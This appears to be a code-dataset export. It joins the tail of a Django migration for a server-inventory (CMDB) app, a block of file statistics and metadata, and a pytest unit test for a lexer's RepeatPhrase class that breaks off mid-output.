('warranty_period', models.DateTimeField(blank=True, null=True)),
('order_no', models.CharField(blank=True, max_length=100, verbose_name='\u8ba2\u5355\u7f16\u53f7')),
('contract_no', models.CharField(blank=True, max_length=100, verbose_name='\u5408\u540c\u7f16\u53f7')),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('is_wrong', models.BooleanField(default=False)),
('wrong_info', models.TextField(blank=True, verbose_name='\u5f02\u5e38\u5bf9\u6bd4')),
('is_confirmed', models.BooleanField(default=False)),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Product', verbose_name='\u6240\u5c5e\u90e8\u95e8')),
('idc', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Idc', verbose_name='\u6240\u5728\u673a\u623f')),
('project', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Project', verbose_name='\u6240\u5c5e\u9879\u76ee')),
('supply', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Supply', verbose_name='\u6240\u5c5e\u4f9b\u5e94\u5546')),
],
),
migrations.CreateModel(
name='Usage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateTimeField(blank=True, null=True)),
('hw_type', models.CharField(blank=True, max_length=50, verbose_name='\u786c\u4ef6\u7c7b\u578b')),
('usage', models.TextField(blank=True, verbose_name='\u4f7f\u7528\u7387')),
('host', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668')),
],
),
migrations.CreateModel(
name='UserInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=100, null=True)),
('password', models.CharField(max_length=100, null=True)),
],
),
migrations.AddField(
model_name='host',
name='idc',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Idc', verbose_name='\u6240\u5728\u673a\u623f'),
),
migrations.AddField(
model_name='host',
name='project',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Project', verbose_name='\u6240\u5c5e\u9879\u76ee'),
),
migrations.AddField(
model_name='host',
name='supply',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Supply', verbose_name='\u6240\u5c5e\u4f9b\u5e94\u5546'),
),
migrations.AddField(
model_name='flowupdatelog',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u64cd\u4f5c\u673a\u5668'),
),
migrations.AddField(
model_name='fittingssd',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingssd',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingraid',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingraid',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingpower',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingpower',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingnic',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingnic',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingmod',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingmod',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingmemory',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingmemory',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittinggpu',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittinggpu',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingdisk',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingdisk',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingcard',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingcard',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fitting',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fitting',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='cabinet',
name='idc',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Idc', verbose_name='\u6240\u5728\u673a\u623f'),
),
migrations.AddField(
model_name='cabinet',
name='serverList',
field=models.ManyToManyField(blank=True, to='cmdb.Host', verbose_name='\u6240\u5728\u670d\u52a1\u5668'),
),
]
| 75.486111
| 318
| 0.61557
| 4,964
| 43,480
| 5.246172
| 0.088437
| 0.087781
| 0.076031
| 0.114047
| 0.884187
| 0.87716
| 0.855119
| 0.835266
| 0.821519
| 0.761923
| 0
| 0.094982
| 0.214006
| 43,480
| 575
| 319
| 75.617391
| 0.667037
| 0.001564
| 0
| 0.677249
| 1
| 0
| 0.212974
| 0.081895
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001764
| 0.005291
| 0
| 0.012346
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0fec75ddde5c75e14c62e8970adcf92447989b33
| 42,196
|
py
|
Python
|
src/TheLanguage/Lexer/Phrases/UnitTests/RepeatPhrase_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | null | null | null |
src/TheLanguage/Lexer/Phrases/UnitTests/RepeatPhrase_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | null | null | null |
src/TheLanguage/Lexer/Phrases/UnitTests/RepeatPhrase_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | 1
|
2021-06-18T18:58:57.000Z
|
2021-06-18T18:58:57.000Z
|
# ----------------------------------------------------------------------
# |
# | RepeatPhrase_UnitTest.py
# |
# | David Brownell <db@DavidBrownell.com>
# | 2021-09-24 14:30:09
# |
# ----------------------------------------------------------------------
# |
# | Copyright David Brownell 2021
# | Distributed under the Boost Software License, Version 1.0. See
# | accompanying file LICENSE_1_0.txt or copy at
# | http://www.boost.org/LICENSE_1_0.txt.
# |
# ----------------------------------------------------------------------
"""Unit test for RepeatPhrase.py"""
import os
import re
import textwrap
import pytest
import CommonEnvironment
from CommonEnvironmentEx.Package import InitRelativeImports
# ----------------------------------------------------------------------
_script_fullpath = CommonEnvironment.ThisFullpath()
_script_dir, _script_name = os.path.split(_script_fullpath)
# ----------------------------------------------------------------------
with InitRelativeImports():
from ..OrPhrase import OrPhrase
from ..RepeatPhrase import *
from ..TokenPhrase import (
NewlineToken,
RegexToken,
TokenPhrase,
)
from ...Components.Phrase import Phrase
from ...Components.UnitTests import (
CoroutineMock,
CreateIterator,
MethodCallsToString,
parse_mock,
)
# ----------------------------------------------------------------------
class TestStandard(object):
_word_phrase = TokenPhrase(RegexToken("Word", re.compile(r"(?P<value>[a-zA-Z]+)")))
_newline_phrase = TokenPhrase(NewlineToken())
_or_phrase = OrPhrase([_word_phrase, _newline_phrase])
_phrase = RepeatPhrase(_or_phrase, 2, 4)
_exact_phrase = RepeatPhrase(_or_phrase, 4, 4)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_MatchSingleLine(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
""",
),
),
parse_mock,
single_threaded=True,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[2, 1] (4)"
Success: True
""",
)
assert MethodCallsToString(parse_mock) == textwrap.dedent(
"""\
0) StartPhrase, "{(Word | Newline+), 2, 4}"
1) StartPhrase, "(Word | Newline+)"
2) StartPhrase, "Word"
3) OnInternalPhraseAsync, 0, 3
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
4) EndPhrase, "Word" [True]
5) StartPhrase, "Newline+"
6) EndPhrase, "Newline+" [False]
7) OnInternalPhraseAsync, 0, 3
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
8) EndPhrase, "(Word | Newline+)" [True]
9) StartPhrase, "(Word | Newline+)"
10) StartPhrase, "Word"
11) EndPhrase, "Word" [False]
12) StartPhrase, "Newline+"
13) OnInternalPhraseAsync, 3, 4
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
14) EndPhrase, "Newline+" [True]
15) OnInternalPhraseAsync, 3, 4
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
16) EndPhrase, "(Word | Newline+)" [True]
17) OnInternalPhraseAsync, 0, 4
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
18) EndPhrase, "{(Word | Newline+), 2, 4}" [True]
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_MatchTwoLines(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 4] (7)"
IterEnd: "[3, 1] (8)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 8
Start: 7
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[3, 1] (8)"
Success: True
""",
)
assert len(parse_mock.method_calls) == 35
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_MatchThreeLines(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two
three
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 4] (7)"
IterEnd: "[3, 1] (8)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 8
Start: 7
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[3, 1] (8)"
Success: True
""",
)
assert len(parse_mock.method_calls) == 35
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_NoMatch(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
123
456
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: None
Phrase: "Word"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: None
Phrase: "Newline+"
IsComplete: True
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 1] (0)"
Success: False
""",
)
assert len(parse_mock.method_calls) == 8
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_partialMatch(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
abc123
def456
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='abc'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: None
Phrase: "Word"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: None
Phrase: "Newline+"
IsComplete: True
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Success: False
""",
)
assert len(parse_mock.method_calls) == 16
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_ExactMatch(self, parse_mock):
result = await self._exact_phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 4] (7)"
IterEnd: "[3, 1] (8)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 8
Start: 7
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 4, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[3, 1] (8)"
Success: True
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_ExactLimitedMatch(self, parse_mock):
result = await self._exact_phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two
three
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
